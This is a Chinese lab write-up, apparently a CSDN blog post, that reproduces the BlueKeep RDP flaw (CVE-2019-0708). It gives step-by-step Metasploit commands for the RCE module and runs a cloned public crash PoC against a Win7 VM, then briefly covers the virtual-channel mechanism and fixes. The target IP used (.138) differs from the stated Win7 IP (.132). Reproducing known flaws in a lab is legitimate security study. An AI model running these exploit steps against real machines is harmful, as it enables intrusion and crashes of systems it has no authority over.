CVE-2019-0708漏洞复现

CVE-2019-0708

简介

该漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是2019年里危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

前期准备

win7一台(IP:192.168.91.132)
在这里插入图片描述
kali linux一台(IP:192.168.91.137)
在这里插入图片描述
打开win7允许远程的选项
在这里插入图片描述
win7打开3389端口
在这里插入图片描述
并关闭防火墙在这里插入图片描述

开始实验

方法一

gohb@gohb:~/桌面$ sudo apt-get update
gohb@gohb:~/桌面$ sudo apt-get install metasploit-framework 
#下载最新的metasploit
gohb@gohb:~/桌面$ msfconsole


msf5 > search cve_2019_0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
#查看相关参数
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOST 192.168.91.138 
#设置靶机ip
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
#3代表目标机器架构为VMware、2代表目标架构是virtulbox
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

测试结果

在这里插入图片描述

方法二

gohb@gohb:~/桌面$ git clone https://github.com/n1xbyte/CVE-2019-0708.git
#下载已有poc
gohb@gohb:~/桌面$ cd CVE-2019-0708/
gohb@gohb:~/桌面/CVE-2019-0708$ sudo apt-get install python3-pip
#kali不自带pip3
gohb@gohb:~/桌面/CVE-2019-0708$ pip3 install impacket
#下载python3相关模块
gohb@gohb:~/桌面/CVE-2019-0708$ python3 crashpoc.py 192.168.91.138 64

测试结果

在这里插入图片描述

漏洞原理

远程桌面协议(RDP)支持客户端和服务器之间的连接,并且以虚拟信道的形式定义了它们之间通信的数据。虚拟信道是双向数据管道,可以针对RDP实现扩展。 Windows Server 2000使用RDP 5.1定义了32个静态虚拟信道(Static Virtual Channel, SVC),由于信道数量的限制,进一步定义了动态虚拟信道(Dynamic Virtual Channel, DVC),这些信道包含在专用SVC中。 SVC在会话开始时创建并保持到会话终止,而DVC将会根据是否需要确定是否创建和抛弃。

修复方案

1、最简便的方法就是安装一个安全管家,比如火绒、360之类的
2、把系统的自动更新打开或者到微软官网下载补丁
3、把自己电脑上的远程桌面关掉、防火墙开启

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值